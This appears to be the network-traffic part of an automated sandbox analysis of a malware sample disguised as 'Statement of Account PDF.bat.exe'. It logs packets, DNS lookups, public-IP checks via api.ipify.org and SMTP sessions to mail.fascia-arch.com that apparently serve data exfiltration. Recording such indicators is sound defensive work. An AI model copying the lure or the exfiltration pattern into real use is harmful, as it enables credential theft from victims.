                                                      Apr 26, 2024 10:36:17.777760983 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:17.975775003 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:17.977418900 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:18.174046993 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.174278021 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:18.371315956 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.371948957 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:18.609695911 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.678085089 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.684621096 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:18.890383959 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.890392065 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:18.894606113 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.132575989 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:19.141494036 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:19.143753052 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.340066910 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:19.340130091 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:19.341347933 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.341423988 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.341451883 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.341535091 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.343324900 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.537954092 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:19.538013935 CEST49778587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:19.539740086 CEST5874977850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192568064 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192580938 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192632914 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192677975 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192732096 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192745924 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192765951 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192809105 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385075092 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385274887 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385303974 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385320902 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385329962 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385616064 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.386251926 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.448916912 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:50.931499958 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.068711996 CEST49777587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.127595901 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.128029108 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.129076958 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.264890909 CEST5874977750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.265340090 CEST49777587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.266341925 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.329189062 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.334577084 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.464175940 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.464627028 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.603967905 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.604675055 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.712610006 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.714802980 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.800863981 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.802799940 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.911451101 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.911760092 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.000360966 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.000869036 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.109939098 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.110620022 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.214148045 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214175940 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214195013 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214428902 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.219887972 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.325287104 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325584888 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325628042 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325654030 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.328391075 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.423707962 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.430407047 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.532083988 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.534200907 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.626669884 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.627070904 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.699553967 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.731260061 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.731336117 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.787659883 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.823601961 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.823879004 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.896142006 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.896193027 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.898459911 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.898500919 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.984177113 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.984246969 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.021745920 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.022043943 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.210360050 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.210480928 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.214745998 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.218025923 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.218214989 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.276520014 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.410368919 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.412219048 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.412369013 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.412369013 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.412926912 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.416618109 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.461055040 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.470890999 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.474169970 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.477387905 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.480663061 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670061111 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.670147896 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.670810938 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670876980 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670877934 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.671061993 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.672607899 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.708465099 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.708642006 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.872225046 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872236013 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872251987 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872330904 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.872366905 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872478962 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.904931068 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.905142069 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.068154097 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.068268061 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.068305969 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.068397999 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.069108009 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.072704077 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.102890968 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.103477955 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.264677048 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264703035 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264723063 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264842033 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264919043 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.265065908 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.269814968 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.269833088 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270190954 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270323038 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270356894 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270693064 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270709991 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270725965 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270740986 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270773888 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270792007 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270853043 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.271147966 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310610056 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310636044 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310657024 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310683012 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.312654018 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.493275881 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493299961 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493331909 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493361950 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493380070 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493395090 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493424892 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493465900 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493482113 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493855953 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494354963 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494386911 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494445086 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494836092 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.543030977 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.545636892 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.652028084 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.743968964 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.744157076 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.942292929 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.942625999 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.140851021 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.141107082 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.338593960 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.342082024 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.579330921 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.596251011 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.596463919 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.792727947 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.792983055 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.793493032 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793493032 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793557882 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793646097 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.794806957 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.990876913 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.990997076 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.991076946 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.991354942 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.991617918 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992790937 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992810011 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992835045 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992868900 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992943048 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992970943 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.996623993 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.031796932 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.031902075 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.187915087 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189121962 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189189911 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.189817905 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189886093 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189991951 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.190098047 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.190176010 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.190207958 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.193263054 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.193603039 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.199022055 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.228240967 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.228689909 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.385457039 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.385469913 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.385524988 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.386250973 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386261940 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386307955 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386832952 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.394967079 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.394977093 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395025969 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395087004 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395219088 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395231962 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424770117 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424937010 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424987078 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581650019 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581666946 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581680059 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.582015038 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.582766056 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.683263063 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:04.998109102 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.135195971 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.155577898 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.197303057 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.200620890 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.331267118 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.331664085 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.331890106 CEST49787587192.168.2.450.87.195.61
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 10:32:57.790539980 CEST | 54701 | 53 | 192.168.2.4 | 1.1.1.1
Apr 26, 2024 10:32:57.915714979 CEST | 53 | 54701 | 1.1.1.1 | 192.168.2.4
Apr 26, 2024 10:32:59.370839119 CEST | 49777 | 53 | 192.168.2.4 | 1.1.1.1
Apr 26, 2024 10:32:59.545531034 CEST | 53 | 49777 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 26, 2024 10:32:57.790539980 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd3d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:32:59.370839119 CEST | 192.168.2.4 | 1.1.1.1 | 0xdd75 | Standard query (0) | mail.fascia-arch.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 10:32:57.915714979 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd3d | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:32:57.915714979 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd3d | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:32:57.915714979 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd3d | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:32:59.545531034 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd75 | No error (0) | mail.fascia-arch.com |  | 50.87.195.61 | A (IP address) | IN (0x0001) | false
                                                      • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.26.12.205 | 443 | 7252 | C:\Users\user\Desktop\Statement of Account PDF.bat.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 08:32:58 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-26 08:32:58 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:32:58 GMT
Content-Type: text/plain
Content-Length: 15
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 87a539ad7b724974-MIA
2024-04-26 08:32:58 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
Data Ascii: 102.129.152.220


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 104.26.12.205 | 443 | 7720 | C:\Users\user\AppData\Roaming\gDdsxauPhk.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 08:33:04 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-26 08:33:04 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:33:04 GMT
Content-Type: text/plain
Content-Length: 15
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 87a539d4fa3109d2-MIA
2024-04-26 08:33:04 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
Data Ascii: 102.129.152.220


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 104.26.12.205 | 443 | 7220 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 08:33:14 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-26 08:33:14 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:33:14 GMT
Content-Type: text/plain
Content-Length: 15
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 87a53a102f23a4c1-MIA
2024-04-26 08:33:14 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
Data Ascii: 102.129.152.220


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49755 | 104.26.12.205 | 443 | 7752 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 08:33:21 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-26 08:33:22 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:33:22 GMT
Content-Type: text/plain
Content-Length: 15
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 87a53a412cd77436-MIA
2024-04-26 08:33:22 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
Data Ascii: 102.129.152.220


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 26, 2024 10:33:00.070991039 CEST | 587 | 49736 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:32:59 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:33:00.074568987 CEST | 49736 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:33:00.271383047 CEST | 587 | 49736 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:33:00.271923065 CEST | 49736 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:33:00.470662117 CEST | 587 | 49736 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:33:06.113437891 CEST | 587 | 49739 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:06 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:33:06.117778063 CEST | 49739 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:33:06.314546108 CEST | 587 | 49739 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
